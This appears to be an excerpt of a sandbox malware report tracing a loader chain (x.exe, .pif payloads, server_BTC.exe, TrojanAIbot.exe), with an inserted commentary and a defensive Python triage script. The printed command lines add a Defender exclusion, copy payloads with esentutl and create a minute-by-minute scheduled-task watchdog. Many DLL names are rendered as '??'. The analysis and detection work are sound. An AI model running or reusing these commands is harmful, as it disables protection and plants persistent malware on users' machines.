Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\lxsyrsiW.pif | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\x.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\x.exe | File read: C:\Users\user\Desktop\x.exe
Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Evasive API call chain: __getmainargs,DecisionNodes,exit (graph_8-9141)
Source: unknown | Process created: C:\Users\user\Desktop\x.exe "C:\Users\user\Desktop\x.exe"
Source: C:\Users\user\Desktop\x.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Users\user\Desktop\x.exe | Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o
Source: C:\Windows\SysWOW64\esentutl.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\x.exe | Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:00 /du 23:59 /sc daily /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFB9.tmp.cmd""
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown | Process created: C:\Users\Public\Libraries\Wisrysxl.PIF "C:\Users\Public\Libraries\Wisrysxl.PIF"
Source: C:\Windows\SysWOW64\esentutl.exe | Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Windows\System32\conhost.exe | Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Windows\System32\conhost.exe | Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: unknown | Process created: C:\Users\Public\Libraries\Wisrysxl.PIF "C:\Users\Public\Libraries\Wisrysxl.PIF"
Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\Desktop\x.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "
Source: C:\Users\user\Desktop\x.exe | Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o
Source: C:\Users\user\Desktop\x.exe | Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:00 /du 23:59 /sc daily /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFB9.tmp.cmd""
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
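The process tree above carries the whole infection chain in plain command lines, and the "Code function" entries at the top of this section carry the injection primitives: esentutl /y <src> /d <dst> /o is used as a copy primitive (cmd.exe becomes alpha.pif, and x.exe becomes Wisrysxl.PIF, whose dropped-file SHA256 above equals the sample's own hash); powershell Add-MpPreference -ExclusionPath carves a Defender hole around ACCApi; schtasks /sc daily /st 10:00 /du 23:59 /ri 1 relaunches TrojanAIbot.exe every minute for the whole day, which is a watchdog rather than a schedule; the .pif payloads run from C:\Users\Public\Libraries; and in Wisrysxl.PIF the GetThreadContext / SetThreadContext / NtResumeThread chain is the tail of the process-hollowing sequence the report flags, while x.exe pairs CreateProcessAsUserW with ResumeThread, which only makes sense for a child started suspended. The following is an added example, not Joe Sandbox tooling and not code from the sample: a small set of triage rules run over report lines of both kinds. The rule names and thresholds are mine; the sample lines are copied from this report (both the glued "x.exeCode function:" rendering and a "|"-separated one are accepted) plus one benign conhost.exe launch for contrast.

```python
import re
from typing import List, Tuple

# Constructed input: lines from this report plus one benign conhost.exe launch.
SAMPLE_LINES = [
    r"Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 27_2_02D88D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,27_2_02D88D6E",
    r"Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02EDF7C8 InetIsOffline,CoInitialize,CoUninitialize,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess",
    r"Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o",
    r"""Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'""",
    r"""Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:00 /du 23:59 /sc daily /ri 1 /f""",
    r"Source: C:\Users\user\Desktop\x.exe | Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif",
    r"Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
]

# "Source: <file>[ | ]<kind>: <detail>"; the optional separator tolerates the glued rendering.
LINE_RE = re.compile(r"^Source:\s*(?P<src>.*?)\s*\|?\s*(?P<kind>Process created|Code function):\s*(?P<detail>.*)$")
FUNC_ID_RE = re.compile(r"^\d+_\d+_[0-9A-Fa-f]+$")  # e.g. 27_2_02D88D6E, repeated at the end of glued lines
ESENTUTL_COPY_RE = re.compile(r"esentutl(?:\.exe)?\s+/y\s+(?P<src>\S+)\s+/d\s+(?P<dst>\S+)", re.I)
SCHTASKS_REPEAT_RE = re.compile(r"\bschtasks\b.*?/create\b.*?\s/ri\s+(?P<minutes>\d+)", re.I)
DEFENDER_EXCLUSION_RE = re.compile(r"\bAdd-MpPreference\b.*?-Exclusion(?:Path|Process|Extension)", re.I)


def api_chain_rules(detail: str) -> List[str]:
    """Rules over one 'Code function' entry: '<id> API1,API2,...[,<id>]'."""
    apis = {t for t in re.split(r"[,\s]+", detail) if t and not FUNC_ID_RE.match(t)}
    hits = []
    if apis & {"SetThreadContext", "Wow64SetThreadContext"} and apis & {"NtResumeThread", "ResumeThread"}:
        hits.append("thread context rewritten then resumed (tail of a process-hollowing sequence)")
    if apis & {"CreateProcessA", "CreateProcessW", "CreateProcessAsUserA", "CreateProcessAsUserW"} and "ResumeThread" in apis:
        hits.append("CreateProcess* paired with ResumeThread (consistent with a CREATE_SUSPENDED launch)")
    return hits


def process_rules(detail: str) -> List[str]:
    """Rules over one 'Process created' entry: '<image path> <command line>'."""
    image = detail.split(" ", 1)[0]
    low = image.lower()
    hits = []
    m = ESENTUTL_COPY_RE.search(detail)
    if m:
        hits.append(f"esentutl /y used as a copy primitive: {m['src']} -> {m['dst']}")
    if DEFENDER_EXCLUSION_RE.search(detail):
        hits.append("Defender exclusion added with Add-MpPreference")
    m = SCHTASKS_REPEAT_RE.search(detail)
    if m:
        hits.append(f"scheduled task with /ri {m['minutes']}: re-launches its action every "
                    f"{m['minutes']} minute(s) (watchdog persistence)")
    if low.endswith(".pif") or low.startswith("c:\\users\\public\\") or "\\appdata\\local\\temp\\" in low:
        hits.append(f"executable launched from a user-writable location: {image}")
    return hits


def triage(lines) -> List[Tuple[str, str, str]]:
    """Return (source, rule hit, start of the entry) for every line that trips a rule."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        rules = api_chain_rules if m["kind"] == "Code function" else process_rules
        for hit in rules(m["detail"]):
            findings.append((m["src"], hit, m["detail"][:70]))
    return findings


if __name__ == "__main__":
    for src, hit, entry in triage(SAMPLE_LINES):
        print(f"[{hit}]\n    source: {src}\n    entry : {entry}...")
```

Feeding the whole behaviour section of a report through triage() gives a short list of the entries worth reading first; the location rule is intentionally loose (anything under C:\Users\Public or a Temp directory) because the same loader family rotates the .pif names between samples while keeping the directories.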
                      Source: C:\Users\user\Desktop\x.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: url.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
Source: C:\Users\user\Desktop\x.exe Section loaded: ??????p.dll
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
